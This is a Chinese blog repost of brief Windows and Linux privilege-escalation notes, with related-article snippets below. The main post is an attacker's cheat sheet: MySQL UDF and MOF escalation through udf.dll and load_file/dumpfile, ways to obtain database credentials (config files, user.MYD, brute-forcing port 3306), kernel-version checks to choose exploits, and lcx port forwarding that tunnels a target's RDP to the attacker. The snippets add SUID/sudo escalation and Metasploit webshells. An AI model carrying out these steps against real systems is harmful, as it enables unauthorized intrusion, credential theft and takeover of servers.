windows与linux提权

最新推荐文章于 2023-04-09 11:55:52 发布
最新推荐文章于 2023-04-09 11:55:52 发布
阅读量301 收藏 1
点赞数
文章标签: 数据库
原文链接:http://blog.51cto.com/3945465/2149547
版权

udf提权原理:
通过root权限导出udf.dll到系统目录下,可以通过udf.dll调用执行cmd
获取mysql数据库的账号密码
1.查看网站源码里数据库配置文件(inc,conn,config,sql,common,data等)
2.查看数据库安装路径下的/data/mysql/user.myd
3.暴力破解mysql密码 3306端口RuQin

mysql 5.0以下版本:
C:\winnt\udf.dll 2000
C:\windows\udf.dll 2003
mysql 5.0以上版本:
需要将udf.dll导出到mysql安装目录lib\plugin\

show tables; 查看数据库中有什么数据表

mysql mof提权
1、上传mof.php文件
2、上传x.mof
执行sql select load_file('mof文件本身存储路径') into dumpfile '导出位置'

linux提权
uname -r 查看系统内核版本信息
uname -a 详细查看内核版本信息
找到对应版本的漏洞利用
www.exploit-db.com

lcx端口转发:
lcx.exe -slave ×××者ip 端口 目标ip 3389
×××者主机输入:
lcx.exe -listen 上面的端口 3389
此时的127.0.0.1:端口已经代表了目标ip:3389

转载于:https://blog.51cto.com/3945465/2149547

weixin_34357962
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
win 和linux 提权
freshfox的博客
06-24 232
win下获取未打补丁命令 systeminfo>micropoor.txt&(for%iin(KB977165KB2160329KB2503665KB2592799 KB2707511KB2829361KB2850851KB3000061KB3045171KB3077657KB3079904 KB3134228KB3143141KB314178...
LinuxWindows提权命令速记
Fly_鹏程万里
05-13 1606
Linux查看系统版本信息cat /etc/issue lsb_release -a查看系统内核版本信息uname -a cat /proc/version查看系统环境变量env set cat /etc/profile查看是否有打印机lpstat -a查看主机架构arch --version查看系统开启的服务以及权限ps -ef ps aux查看计划任务cat /etc/contab c...
Windowslinux提权方法,WindowsLinux本地用户提权体验(一)
weixin_33444829的博客
05-07 566
无论是Windows系统还是linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证。这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行WindowsLinux下的提权测试。一、windows下获取至高权限大家知道,在Windows系统中SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。...
windowslinux本地用户提权
zhangyonzhi的专栏
12-07 277
无论是Windows系统还是Linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证。这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行WindowsLinux下的提权测试。     一、windows下获取至高权限   大家知道,在Windows系统中SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Wind...
WindowsLinux等系统提权工具
01-20
系统提权
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url...  msfpayload windows/meterpret
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好...
Linux-Unix类提权文档1
08-03
Linux-Unix类提权文档1】主要涉及的是在Linux操作系统中的提权技术,这是网络安全领域的一个重要话题,特别是对于系统管理员和安全研究人员来说。提权是指非特权用户通过利用系统漏洞或特定技巧获取更高权限的过程...
Windowslinux提权方法,WindowsLinux本地用户提权体验
weixin_29959549的博客
05-07 232
无论是系统还是Linux系统都是基于权限控制的,其严格的用户等级和权限是系统的有力保证。这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行及Linux下的提权。一、windows下获取至高权限大家知道,在Windows系统中SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞...
linuxwindows提权
u012911055的专栏
11-21 1364
Linux提权普及[r00ts小组] 最近呢! 蛮忙的,好久没更新博客,也好久没露过头,慢慢的淡下来了。 但是还是经常在我的群里面说话。 我最近搞了个渗透培训班(不是无偿的),经常做一些视频,上传到群共享等等 有兴趣的人可以加我QQ说! 这都是些前文吧 ================================================
常见windowsLinux提权的方法
最新发布
weixin_62369433的博客
04-09 766
该方法仅供学习和研究使用,请勿用于非法用途。
linux下 udf提权_Windows 下的提权大合集
weixin_39529443的博客
12-13 89
文章来源:HACK学习呀Windows 下的提权大合集项目地址:https://github.com/lyshark/Windows-exploitsWindows平台提权漏洞集合项目地址:https://github.com/SecWiki/windows-kernel-exploits各大平台提权工具项目地址:https://github.com/klsfct/getshellWin...
windowsLinux权限提升
duan_qiao925的博客
05-27 390
放在开头 本人水平很菜(没有谦虚),此文仅为个人备忘录,算是自己对学过知识的一个总结以备复习。本人qq:925047779,关于本文可能出现的的问题请联系我,出现错误必及时修改,也欢迎一起探讨。 权限提升 由于现在的操作系统多为多用户操作系统,存在用户间权限控制,比如通过web漏洞拿到的是Web进程的权限,往往Web服务都是以一个权限很低的账号启动的,因此通过Webshell进行操作可能会受限,这时便需要提权Windows提权 溢出提权 通常是通过windows系统漏洞或系统中软件的漏洞来获取os的sy
DAY28:LinuxWindows 系统提权
qq_49433473的博客
08-11 4776
LinuxWindows 系统提权、内核漏洞提权、脏牛提权(Dirty COW)、 SUID 提权常用的可用于提权的程序`Nmap、Vim、find、Bash、More、Less、Nano、cp、awk` sudo提权、zip提权、计划任务提取、Linux明文root密码提权、利用 root 无密码执行...
Windowslinux提权方法,WindowsLinux本地用户提权
weixin_28829325的博客
05-07 740
无论是Windows系统还是Linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证。这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行WindowsLinux下的提权测试。 一、windows下获取至高权限 大家知道,在Windows系统中SYSTEM是无论是Windows系统还是Linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证。这么严密...
Linux&Windows提权思维导图
Fly_鹏程万里
08-20 480
Linux提权简单总结
Aiwin的博客
08-10 2189
Linux提权简单总结
windowslinux提权
xiaoWhite_meng的博客
04-23 1661
前提:拿到wbshell后做的事情webshell 通常继承了web 用户的权限通常情况下,web用户的权限是比较低的   权限提升1:获取其他用户的访问权限,甚至是管理员。      ! 水平权限提升(越权)(普通用户更改普通用户的帖子)                对一个论坛来说 :                            超级管理员(管理所有)、版主(管理一版的帖子)、普通用...
Windows提权技巧与常见账户类型详解
- 文档也提到了Linux系统下的提权,尽管没有详细展开,但可以推测这部分内容会涉及Linux的用户权限模型和相应的提权技术。 4. **第三方软件提权** - 文章可能提及利用第三方工具,如工具包或恶意软件,来绕过系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值